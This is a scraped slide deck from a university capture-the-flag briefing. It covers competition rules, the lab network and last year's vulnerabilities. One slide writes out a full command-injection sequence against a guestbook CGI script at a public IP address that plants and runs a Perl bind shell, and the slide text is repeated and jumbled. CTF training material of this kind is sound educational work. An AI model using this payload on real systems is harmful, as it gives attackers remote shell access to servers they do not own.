Presentation is loading. Please wait.

Presentation is loading. Please wait.

CTF Mike Gerschefske Justin Gray. What is it? Came from Defcon Came from Defcon UCSB sp0nsorz – won last years Defcon UCSB sp0nsorz – won last years Defcon.

Published byGeoffrey Austin Modified over 9 years ago

Similar presentations

Presentation on theme: "CTF Mike Gerschefske Justin Gray. What is it? Came from Defcon Came from Defcon UCSB sp0nsorz – won last years Defcon UCSB sp0nsorz – won last years Defcon."— Presentation transcript:

1 CTF Mike Gerschefske Justin Gray

2 What is it? Came from Defcon Came from Defcon UCSB sp0nsorz – won last years Defcon UCSB sp0nsorz – won last years Defcon Test Skills of understanding security Test Skills of understanding security What it’s not! What it’s not! See who’s 1337 or l4am3r through script kiddie techniques See who’s 1337 or l4am3r through script kiddie techniques

3 Rules Don’t be Lame Don’t be Lame This includes (D)DoS – Unfair bandwidth practices This includes (D)DoS – Unfair bandwidth practices Circumventing the private network and using public ip address (not cool) Circumventing the private network and using public ip address (not cool) Illegal stuff is not a good idea Illegal stuff is not a good idea E.g. don’t hack the power grid E.g. don’t hack the power grid

4 Everything else is legal! At Defcon team reverse engineered score system and generated tokens. At Defcon team reverse engineered score system and generated tokens. People got upset, but was legal People got upset, but was legal Can root boxes but not what’s being tested. Can root boxes but not what’s being tested. w00t w00t

5 Last years event Have to assume this year is similar Have to assume this year is similar We p0wn3d the easy parts We p0wn3d the easy parts SQL Injection SQL Injection Example http://128.198.61.43/~estore/cgi-bin/login.php Example http://128.198.61.43/~estore/cgi-bin/login.phphttp://128.198.61.43/~estore/cgi-bin/login.php Exploit unchecked user input Exploit unchecked user input Security through obscurity Security through obscurity OMG – this really works!!! OMG – this really works!!! Perl example Perl example

6 Test Network Real Network Image 10.10.1.2 10.10.1.3 Vuln 10.10.1.4 Team Hub Team Box 10.10.1.1 Mon Box 10.10.1.x Attack Boxes Console for Fixes Image Test Box Vuln Patch Test Vuln Attack Box UCCS Boxes UCCS Boxes

7 Affectively created two directional nat. Affectively created two directional nat. Blocking IP addresses is futile Blocking IP addresses is futile All traffic comes from SAME IP All traffic comes from SAME IP Forces Packet Inspection Forces Packet Inspection Network Topography

8 the example http://128.198.61.43/~guestbook/cgi- bin/guestbook.pl?guestbook=`echo%20- e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhile(\044c =new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listen)- >accept){\n\044~->fdopen(\044c,w)\073\nSTDIN- >fdopen(\044c,r)\073\nsystem\044_%20while<>\073\n\175\n\175\n" %20>%20final.pl` http://128.198.61.43/~guestbook/cgi- bin/guestbook.pl?guestbook=`echo%20- e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhile(\044c =new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listen)- >accept){\n\044~->fdopen(\044c,w)\073\nSTDIN- >fdopen(\044c,r)\073\nsystem\044_%20while<>\073\n\175\n\175\n" %20>%20final.pl` http://128.198.61.43/~guestbook/cgi- bin/guestbook.pl?guestbook=`echo%20- e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhile(\044c =new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listen)- http://128.198.61.43/~guestbook/cgi- bin/guestbook.pl?guestbook=`echo%20- e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhile(\044c =new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listen)- http://128.198.61.43/~guestbook/cgi- bin/guestbook.pl?guestbook=`chmod%20755%20final.pl` http://128.198.61.43/~guestbook/cgi- bin/guestbook.pl?guestbook=`chmod%20755%20final.pl` http://128.198.61.43/~guestbook/cgi- bin/guestbook.pl?guestbook=`chmod%20755%20final.pl` http://128.198.61.43/~guestbook/cgi- bin/guestbook.pl?guestbook=`chmod%20755%20final.pl` http://128.198.61.43/~guestbook/cgi- bin/guestbook.pl?guestbook=`final.pl` http://128.198.61.43/~guestbook/cgi- bin/guestbook.pl?guestbook=`final.pl` http://128.198.61.43/~guestbook/cgi- bin/guestbook.pl?guestbook=`final.pl` http://128.198.61.43/~guestbook/cgi- bin/guestbook.pl?guestbook=`final.pl`

9 The basstard demo W00t http://128.198.61.43 W00t http://128.198.61.43http://128.198.61.43 SQL Injection SQL Injection Unchecked code injection Unchecked code injection File upload!!! File upload!!! Buffer overrun Buffer overrun Security through obscurity revisited Security through obscurity revisited http://128.198.61.43/test/ccauthd/ccauthd.c http://128.198.61.43/test/ccauthd/ccauthd.c http://128.198.61.43/test/ccauthd/ccauthd.c

10 Backups

11 Network Topography

12 So you wanna be a h4x0rz? Here’s what you need! Here’s what you need! vi – or any editor vi – or any editor a browser – or anything to do http a browser – or anything to do http a compiler (depends on the situation) a compiler (depends on the situation) a debugger (optional) a debugger (optional) a clue! a clue! Dumpster diving is cool Dumpster diving is cool Getting information from the inside Getting information from the inside

Download ppt "CTF Mike Gerschefske Justin Gray. What is it? Came from Defcon Came from Defcon UCSB sp0nsorz – won last years Defcon UCSB sp0nsorz – won last years Defcon."

Similar presentations

HiveMind Distributed File Storage Using JavaScript Botnets Copyright 2013 Sean T. Malone.

HiveMind Distributed File Storage Using JavaScript Botnets Copyright 2013 Sean T. Malone.
B. Ramamurthy 4/17/20151. Overview of EC2 Components (fig. 2.1) 10..* 1 1 1 1 4/17/20152.

B. Ramamurthy 4/17/ Overview of EC2 Components (fig. 2.1) 10..* /17/20152.
Measurement in Networks & SDN Applications. Interesting Questions Who is sending a lot to a subnet? – Heavy Hitters Is someone doing a port Scan? Is someone.

Measurement in Networks & SDN Applications. Interesting Questions Who is sending a lot to a subnet? – Heavy Hitters Is someone doing a port Scan? Is someone.
Hackers, Crackers, and Network Intruders: Heroes, villains, or delinquents? Tim McLaren Thursday, September 28, 2000 McMaster University.

Hackers, Crackers, and Network Intruders: Heroes, villains, or delinquents? Tim McLaren Thursday, September 28, 2000 McMaster University.
How topology decisions affect speed/availability/security/cost/etc. Network Topology.

How topology decisions affect speed/availability/security/cost/etc. Network Topology.
IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.

IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.
Security Forum 2001John Kristoff - DePaul University1 Network Firewalls John Kristoff +1 312 362-5878 DePaul University Chicago, IL 60604.

Security Forum 2001John Kristoff - DePaul University1 Network Firewalls John Kristoff DePaul University Chicago, IL
1 Cleaning up the Internet Using AJAX, SOAP and Comet CS526 Mike Gerschefske Justin Gray James Yoo 02 May 2006.

1 Cleaning up the Internet Using AJAX, SOAP and Comet CS526 Mike Gerschefske Justin Gray James Yoo 02 May 2006.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
URL Obscuring COEN 152/252 Computer Forensics  Thomas Schwarz, S.J. 2004.

URL Obscuring COEN 152/252 Computer Forensics  Thomas Schwarz, S.J
UNCLASSIFIED Secure Indirect Routing and An Autonomous Enterprise Intrusion Defense System Applied to Mobile ad hoc Networks J. Leland Langston, Raytheon.

UNCLASSIFIED Secure Indirect Routing and An Autonomous Enterprise Intrusion Defense System Applied to Mobile ad hoc Networks J. Leland Langston, Raytheon.
January 14, 2010 Introduction to Ethical Hacking and Network Defense MIS 4600 - © Abdou Illia.

January 14, 2010 Introduction to Ethical Hacking and Network Defense MIS © Abdou Illia.
Chapter 6 Network Address Translation (NAT). Network Address Translation  Modification of source or destination IP address  Needed by networks using.

Chapter 6 Network Address Translation (NAT). Network Address Translation  Modification of source or destination IP address  Needed by networks using.
©2009 Justin C. Klein Keane PHP Code Auditing Session 6 Auditing Strategies & Demonstration Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 6 Auditing Strategies & Demonstration Justin C. Klein Keane
Network Threats and Mitigation Networking Essentials Chapter 14 Spring, 2013.

Network Threats and Mitigation Networking Essentials Chapter 14 Spring, 2013.
© 2003 School of Computing, University of Leeds SY32 Secure Computing, Lecture 14 Implementation Flaws Part 2: Malicious Input and Data Validation Issues.

© 2003 School of Computing, University of Leeds SY32 Secure Computing, Lecture 14 Implementation Flaws Part 2: Malicious Input and Data Validation Issues.
A Scanner Sparkly Web Application Proxy Editors and Scanners.

A Scanner Sparkly Web Application Proxy Editors and Scanners.
Use my floppy disk. 1. copy short cut to desktop. 2.run NoAdHOSTS.exe 3. Surf without ad’s. 4.to reverse everything -edit out all url s you want to return.

Use my floppy disk. 1. copy short cut to desktop. 2.run NoAdHOSTS.exe 3. Surf without ad’s. 4.to reverse everything -edit out all url s you want to return.
Internet Safety CSA 105 1.0 September 21, 2010. Internet Threats Malware (viruses) Spyware Spam Hackers Cyber-criminals.

Internet Safety CSA September 21, Internet Threats Malware (viruses) Spyware Spam Hackers Cyber-criminals.
Eucalyptus Virtual Machines Running Maven, Tomcat, and Mysql.

Eucalyptus Virtual Machines Running Maven, Tomcat, and Mysql.

Similar presentations

Ads by Google